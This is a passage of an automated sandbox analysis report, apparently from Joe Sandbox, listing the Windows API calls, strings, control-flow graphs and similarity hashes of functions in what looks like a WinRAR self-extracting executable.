          • Part of subcall function 0012D656: _wcsrchr.LIBVCRUNTIME ref: 0012D660
          • Part of subcall function 0012CAA0: _wcslen.LIBCMT ref: 0012CAA6
          • Part of subcall function 00131900: _wcslen.LIBCMT ref: 00131906
          • Part of subcall function 0012B5D6: _wcslen.LIBCMT ref: 0012B5E2
          • Part of subcall function 0012B5D6: __aulldiv.LIBCMT ref: 0012B60E
          • Part of subcall function 0012B5D6: GetCurrentProcessId.KERNEL32(00000000,?,000186A0,00000000,?,?,00000800,?), ref: 0012B615
          • Part of subcall function 0012B5D6: _swprintf.LIBCMT ref: 0012B640
          • Part of subcall function 0012B5D6: _wcslen.LIBCMT ref: 0012B64A
          • Part of subcall function 0012B5D6: _swprintf.LIBCMT ref: 0012B6A0
          • Part of subcall function 0012B5D6: _wcslen.LIBCMT ref: 0012B6AA
          • Part of subcall function 00124727: __EH_prolog.LIBCMT ref: 0012472C
          • Part of subcall function 0012A212: __EH_prolog.LIBCMT ref: 0012A217
          • Part of subcall function 0012B8E6: SetFileAttributesW.KERNEL32(?,00000000,00000001,?,0012B5B5,?,?,?,0012B405,?,00000001,00000000,?,?), ref: 0012B8FA
          • Part of subcall function 0012B8E6: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0012B5B5,?,?,?,0012B405,?,00000001,00000000,?,?), ref: 0012B92B
        Strings
        • __tmp_reference_source_, xrefs: 00129596
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: _wcslen$H_prolog$AttributesFile_swprintf$CurrentProcess__aulldiv_wcsrchr
        • String ID: __tmp_reference_source_
        • API String ID: 70197177-685763994
        • Opcode ID: 675947e17a31bb1bbdeedfc272cc7cdc55f960c780febd645c36a6a7ae2679a8
        • Instruction ID: 328939162b86135246bb5b1f1b99930cac2554098dc398a223920ca8167e6583
        • Opcode Fuzzy Hash: 675947e17a31bb1bbdeedfc272cc7cdc55f960c780febd645c36a6a7ae2679a8
        • Instruction Fuzzy Hash: 7AA26F71904265AFDF19DF78D895BFE7BB4BF15300F0801B9E8499B182D73059A8CB61
        Function 001491A0 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
        Download Yara Rule
        APIs
        • GetCurrentProcess.KERNEL32(00000000,?,00149176,00000000,0015D570,0000000C,001492CD,00000000,00000002,00000000), ref: 001491C1
        • TerminateProcess.KERNEL32(00000000,?,00149176,00000000,0015D570,0000000C,001492CD,00000000,00000002,00000000), ref: 001491C8
        • ExitProcess.KERNEL32 ref: 001491DA
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: Process$CurrentExitTerminate
        • String ID:
        • API String ID: 1703294689-0
        • Opcode ID: 03bf6896b93a902440fc622a6fbe5a85ba21a09aedad5175f9f02e3c5443f155
        • Instruction ID: a8dc8a156c20f92f5262c125143ba0b86f8e4ea4913ecea3f7283ea61ad97d20
        • Opcode Fuzzy Hash: 03bf6896b93a902440fc622a6fbe5a85ba21a09aedad5175f9f02e3c5443f155
        • Instruction Fuzzy Hash: 6FE04636000648EFCF116F60DD4CE893B7AEB50756B004014F9088B531CB75EDC2CA80
        Function 0013B0BE Relevance: 3.1, APIs: 2, Instructions: 77comCOMMON
        Download Yara Rule
        APIs
        • CLSIDFromString.COMBASE(?,?), ref: 0013B0CF
        • CoCreateInstance.COMBASE(?,00000000,00000005,001564FC,?), ref: 0013B0E6
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: CreateFromInstanceString
        • String ID:
        • API String ID: 432265043-0
        • Opcode ID: a27f015ce75b7a6b2ed34306a42e826d93e22fe2e1a207fe1aa3a09b8ab52a65
        • Instruction ID: 72acfdf02822ed6a098c132989612d12ca74787e698187abad07e6d077387b51
        • Opcode Fuzzy Hash: a27f015ce75b7a6b2ed34306a42e826d93e22fe2e1a207fe1aa3a09b8ab52a65
        • Instruction Fuzzy Hash: 9A212A35600214EFDB04DF68DC9999E7BB9EF48745B000059FA06EB260DB71BD82CF90
        Function 0013B080 Relevance: 3.0, APIs: 2, Instructions: 25nativeCOMMON
        Download Yara Rule
        APIs
        • SetWindowLongW.USER32(?,000000EB), ref: 0013B098
        • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 0013B0B3
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: Window$LongNtdllProc_
        • String ID:
        • API String ID: 2044268144-0
        • Opcode ID: 0f79bc80b68d8648d19f88a995e03d5cbeb345d4410b3d785d6ffe3c7605cb77
        • Instruction ID: e455445a9ed40b39d6f415a8e29a3acbd84c91bd636fefb1f842a610b525fb52
        • Opcode Fuzzy Hash: 0f79bc80b68d8648d19f88a995e03d5cbeb345d4410b3d785d6ffe3c7605cb77
        • Instruction Fuzzy Hash: D9E0E536100118BBCF119F99DD48C8E3F6AEF89760B008111FA1956160D771AA61EBA0
        Function 00137DCC Relevance: .3, Instructions: 343COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: H_prolog
        • String ID:
        • API String ID: 3519838083-0
        • Opcode ID: 8b981b9c287e186ec1f9fdb2a536e30a4aa236d49e6aff94c275b69c7c577a2a
        • Instruction ID: a8f060f2194cdd7ccbab6dd32c541e7126e24cb3a2c50c462d4a823d52d30a6f
        • Opcode Fuzzy Hash: 8b981b9c287e186ec1f9fdb2a536e30a4aa236d49e6aff94c275b69c7c577a2a
        • Instruction Fuzzy Hash: CBD1A3B1A083458FDB24DF28C88075BBBE5BF99308F04456DF8999B282D734E949CB56
        Function 0013C9C0 Relevance: 98.7, APIs: 47, Strings: 9, Instructions: 734windowfilesleepCOMMON
        Download Yara Rule
        APIs
        • __EH_prolog.LIBCMT ref: 0013C9C5
          • Part of subcall function 001212F6: GetParent.USER32(?), ref: 0012132A
          • Part of subcall function 001212F6: GetDlgItem.USER32(00000000,00003021), ref: 0012133A
          • Part of subcall function 001212F6: SetWindowTextW.USER32(00000000,001545F4), ref: 00121350
        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0013CAB1
        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0013CACF
        • IsDialogMessageW.USER32(?,?), ref: 0013CAE2
        • TranslateMessage.USER32(?), ref: 0013CAF0
        • DispatchMessageW.USER32(?), ref: 0013CAFA
        • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 0013CB1D
        • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 0013CB40
        • GetDlgItem.USER32(?,00000068), ref: 0013CB63
        • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0013CB7E
        • SendMessageW.USER32(00000000,000000C2,00000000,001545F4), ref: 0013CB91
          • Part of subcall function 0013E586: _wcslen.LIBCMT ref: 0013E5B0
        • SetFocus.USER32(00000000), ref: 0013CB98
        • _swprintf.LIBCMT ref: 0013CBF7
          • Part of subcall function 00124A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00124A33
        • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 0013CC5A
        • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 0013CC82
        • GetTickCount.KERNEL32 ref: 0013CCA0
        • _swprintf.LIBCMT ref: 0013CCB8
        • GetLastError.KERNEL32(?,00000011), ref: 0013CCEA
        • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 0013CD3D
        • _swprintf.LIBCMT ref: 0013CD74
        • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007402,winrarsfxmappingfile.tmp), ref: 0013CDC8
        • GetCommandLineW.KERNEL32 ref: 0013CDDE
        • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,00171482,00000400,00000001,00000001), ref: 0013CE35
        • Sleep.KERNEL32(00000064), ref: 0013CEA5
        • UnmapViewOfFile.KERNEL32(?,?,0000421C,00171482,00000400), ref: 0013CECE
        • CloseHandle.KERNEL32(00000000), ref: 0013CED7
        • _swprintf.LIBCMT ref: 0013CF0A
        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0013CF69
        • SetDlgItemTextW.USER32(?,00000065,001545F4), ref: 0013CF80
        • GetDlgItem.USER32(?,00000065), ref: 0013CF89
        • GetWindowLongW.USER32(00000000,000000F0), ref: 0013CF98
        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0013CFA7
        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0013D054
        • _wcslen.LIBCMT ref: 0013D0AA
        • _swprintf.LIBCMT ref: 0013D0D4
        • SendMessageW.USER32(?,00000080,00000001,?), ref: 0013D11E
        • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 0013D138
        • GetDlgItem.USER32(?,00000068), ref: 0013D141
        • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 0013D157
        • GetDlgItem.USER32(?,00000066), ref: 0013D171
        • SetWindowTextW.USER32(00000000,0017389A), ref: 0013D193
        • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0013D1F3
        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0013D206
        • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001C7A0,00000000,?), ref: 0013D2A9
        • EnableWindow.USER32(00000000,00000000), ref: 0013D383
        • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 0013D3C5
          • Part of subcall function 0013D872: __EH_prolog.LIBCMT ref: 0013D877
        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0013D3E9
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: Item$MessageText$Send$Window_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableFocusHandleLineMappingModuleNameParamParentSleepTickTranslateUnmapUser__vswprintf_c_l
        • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
        • API String ID: 3593385084-1645151803
        • Opcode ID: 38c194801d9e1aae944164428b4e81ebf4323d8fa0fe86a186e517b19128f786
        • Instruction ID: 2c3b54196073505bd32cf8f13c07b9b21a47e899e73a144a23ee61989bc3adf8
        • Opcode Fuzzy Hash: 38c194801d9e1aae944164428b4e81ebf4323d8fa0fe86a186e517b19128f786
        • Instruction Fuzzy Hash: E042F5B1944314BAEB21AB60FC4AFBE7BBCAB11704F440155F645B64D2CBB44E85CB62
        Function 00131B7C Relevance: 52.8, APIs: 23, Strings: 7, Instructions: 316libraryfileloaderCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 274 131b7c-131b9f call 13ffc0 GetModuleHandleW 277 131ba1-131bb8 GetProcAddress 274->277 278 131c00-131e61 274->278 281 131bd2-131be2 GetProcAddress 277->281 282 131bba-131bd0 277->282 279 131e67-131e72 call 1489de 278->279 280 131f2d-131f59 GetModuleFileNameW call 12d6a7 call 131928 278->280 279->280 291 131e78-131ea6 GetModuleFileNameW CreateFileW 279->291 297 131f5b-131f67 call 12c619 280->297 285 131be4-131bf9 281->285 286 131bfe 281->286 282->281 285->286 286->278 294 131f21-131f28 CloseHandle 291->294 295 131ea8-131eb4 SetFilePointer 291->295 294->280 295->294 298 131eb6-131ed2 ReadFile 295->298 303 131f96-131fbd call 12d71d GetFileAttributesW 297->303 304 131f69-131f74 call 131b34 297->304 298->294 300 131ed4-131ef9 298->300 302 131f16-131f1f call 131697 300->302 302->294 309 131efb-131f15 call 131b34 302->309 312 131fc7 303->312 313 131fbf-131fc3 303->313 304->303 315 131f76-131f94 CompareStringW 304->315 309->302 317 131fc9-131fce 312->317 313->297 316 131fc5 313->316 315->303 315->313 316->317 319 131fd0 317->319 320 132005-132007 317->320 321 131fd2-131ff9 call 12d71d GetFileAttributesW 319->321 322 132114-13211e 320->322 323 13200d-132024 call 12d6f1 call 12c619 320->323 328 132003 321->328 329 131ffb-131fff 321->329 333 132026-132087 call 131b34 * 2 call 12f937 call 124a20 call 12f937 call 13b7e4 323->333 334 13208c-1320bf call 124a20 AllocConsole 323->334 328->320 329->321 332 132001 329->332 332->320 340 13210c-13210e ExitProcess 333->340 339 1320c1-132106 GetCurrentProcessId AttachConsole call 144f93 GetStdHandle WriteConsoleW Sleep FreeConsole 334->339 334->340 339->340
        APIs
        • GetModuleHandleW.KERNEL32(kernel32), ref: 00131B95
        • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00131BA7
        • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00131BD8
        • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00131E82
        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00131E9C
        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00131EAC
        • ReadFile.KERNEL32(00000000,?,00007FFE,00154D24,00000000), ref: 00131ECA
        • CloseHandle.KERNEL32(00000000), ref: 00131F22
        • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00131F37
        • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00154D24,?,00000000,?,00000800), ref: 00131F8B
        • GetFileAttributesW.KERNEL32(?,?,00154D24,00000800,?,00000000,?,00000800), ref: 00131FB5
        • GetFileAttributesW.KERNEL32(?,?,00154DEC,00000800), ref: 00131FF1
          • Part of subcall function 00131B34: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00131B4F
          • Part of subcall function 00131B34: LoadLibraryW.KERNEL32(?,?,?,?,00000800,?,00130633,Crypt32.dll,00000000,001306AD,00000200,?,00130690,00000000,00000000,?), ref: 00131B71
        • _swprintf.LIBCMT ref: 00132063
        • _swprintf.LIBCMT ref: 001320AF
          • Part of subcall function 00124A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00124A33
        • AllocConsole.KERNEL32 ref: 001320B7
        • GetCurrentProcessId.KERNEL32 ref: 001320C1
        • AttachConsole.KERNEL32(00000000), ref: 001320C8
        • _wcslen.LIBCMT ref: 001320DD
        • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 001320EE
        • WriteConsoleW.KERNEL32(00000000), ref: 001320F5
        • Sleep.KERNEL32(00002710), ref: 00132100
        • FreeConsole.KERNEL32 ref: 00132106
        • ExitProcess.KERNEL32 ref: 0013210E
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
        • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
        • API String ID: 1207345701-3298887752
        • Opcode ID: 1e82267e54da6dc10a7b8714718c65a19911d5a0a6aae89fca0d3e1b9903a4ea
        • Instruction ID: 0c994f83650e5ea5701beb12576c42fbcbb38b29cf8e18173503f47131233d76
        • Opcode Fuzzy Hash: 1e82267e54da6dc10a7b8714718c65a19911d5a0a6aae89fca0d3e1b9903a4ea
        • Instruction Fuzzy Hash: B1D184B1008784EBD7319F50D959BDFBAE9FB8430AF50091DFAA5AE150C7B4858CCB92
        Function 0012ED87 Relevance: 23.4, APIs: 4, Strings: 9, Instructions: 663COMMON
        Download Yara Rule
        APIs
        • __EH_prolog.LIBCMT ref: 0012ED90
        • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0012EDCC
          • Part of subcall function 0012D6A7: _wcslen.LIBCMT ref: 0012D6AF
          • Part of subcall function 00131900: _wcslen.LIBCMT ref: 00131906
          • Part of subcall function 00132EC2: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0012CF18,00000000,?,?), ref: 00132EDE
        • _wcslen.LIBCMT ref: 0012F109
        • __fprintf_l.LIBCMT ref: 0012F23C
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
        • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
        • API String ID: 566448164-801612888
        • Opcode ID: 03469e37e95a5578af774e53d51c37bb19898a1d7fb9f28c55d5cc6c47902f4d
        • Instruction ID: 5d144276915f8bfa117c74b60e22607d423a4fc0cf7bf27c9f0a59886ae01a49
        • Opcode Fuzzy Hash: 03469e37e95a5578af774e53d51c37bb19898a1d7fb9f28c55d5cc6c47902f4d
        • Instruction Fuzzy Hash: E632E071900228EBDF28EF68E841AEA77B4FF18704F40057EF90697291E7719DA6CB54
        Function 0013AEE5 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 116COMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 658 13aee5-13af13 ShowWindow call 13ac14 661 13af15-13af1d call 145209 658->661 662 13af1e-13af23 658->662 661->662 664 13af25-13af27 662->664 665 13af29-13af32 call 148a08 662->665 668 13af33-13af3b 664->668 665->668 670 13af41-13af4a call 148a08 668->670 671 13af3d-13af3f 668->671 672 13af4b-13af75 GetWindowRect GetParent MapWindowPoints 670->672 671->672 675 13af80-13afc9 GetParent CreateWindowExW 672->675 676 13af77-13af7a DestroyWindow 672->676 677 13afcb-13afce 675->677 678 13b008-13b00a 675->678 676->675 677->678 681 13afd0-13afd2 677->681 679 13b01e-13b024 678->679 680 13b00c-13b018 ShowWindow UpdateWindow 678->680 680->679 681->679 682 13afd4-13afd7 681->682 682->679 683 13afd9-13afdc 682->683 683->679 684 13afde-13afec call 13ad0e 683->684 684->679 687 13afee-13b006 ShowWindow SetWindowTextW call 145209 684->687 687->679
        APIs
        • ShowWindow.USER32(?,00000000), ref: 0013AEFE
          • Part of subcall function 0013AC14: LoadCursorW.USER32(00000000,00007F00), ref: 0013AC4B
          • Part of subcall function 0013AC14: RegisterClassExW.USER32(00000030), ref: 0013AC6C
        • GetWindowRect.USER32(?,?), ref: 0013AF54
        • GetParent.USER32(?), ref: 0013AF62
        • MapWindowPoints.USER32(00000000,00000000), ref: 0013AF6B
        • DestroyWindow.USER32(00000000), ref: 0013AF7A
        • GetParent.USER32(?), ref: 0013AF97
        • CreateWindowExW.USER32(00000000,RarHtmlClassName,00000000,40000000,?,?,?,?,00000000), ref: 0013AFBB
        • ShowWindow.USER32(?,00000005,00000000), ref: 0013AFF1
        • SetWindowTextW.USER32(?,00000000), ref: 0013AFF9
        • ShowWindow.USER32(00000000,00000005), ref: 0013B00F
        • UpdateWindow.USER32(00000000), ref: 0013B018
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: Window$Show$Parent$ClassCreateCursorDestroyLoadPointsRectRegisterTextUpdate
        • String ID: RarHtmlClassName
        • API String ID: 3841971108-1658105358
        • Opcode ID: e1fbe9bd05e78d821e08b2d1e3b4f9e4cf95307879af12c74e0f8ebf9f65e675
        • Instruction ID: 689d3f5336b5cee443cd8fa883a8ea794a31872ad09ad89f01a13bdfaf95b375
        • Opcode Fuzzy Hash: e1fbe9bd05e78d821e08b2d1e3b4f9e4cf95307879af12c74e0f8ebf9f65e675
        • Instruction Fuzzy Hash: 5141CF71008208EFCB259F60DC8DB6F7FA9EF08701F144559F9899A062EB70D944CB66
        Function 0013E607 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
        Download Yara Rule

        Control-flow Graph

        APIs
          • Part of subcall function 0013C748: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0013C759
          • Part of subcall function 0013C748: KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 0013C76A
          • Part of subcall function 0013C748: IsDialogMessageW.USER32(00010424,?), ref: 0013C77E
          • Part of subcall function 0013C748: TranslateMessage.USER32(?), ref: 0013C78C
          • Part of subcall function 0013C748: DispatchMessageW.USER32(?), ref: 0013C796
        • GetDlgItem.USER32(00000068,00181CF0), ref: 0013E61B
        • ShowWindow.USER32(00000000,00000005,?,?,00000001,?,?,0013C999,001560F0,00181CF0,00181CF0,00001000,?,00000000,?), ref: 0013E643
        • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0013E64E
        • SendMessageW.USER32(00000000,000000C2,00000000,001545F4), ref: 0013E65C
        • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0013E672
        • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0013E68C
        • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0013E6D0
        • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0013E6DE
        • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0013E6ED
        • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0013E714
        • SendMessageW.USER32(00000000,000000C2,00000000,0015549C), ref: 0013E723
          • Part of subcall function 0013A235: DestroyWindow.USER32(?,00000000,0013E640,?,?,00000001,?,?,0013C999,001560F0,00181CF0,00181CF0,00001000,?,00000000,?), ref: 0013A241
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
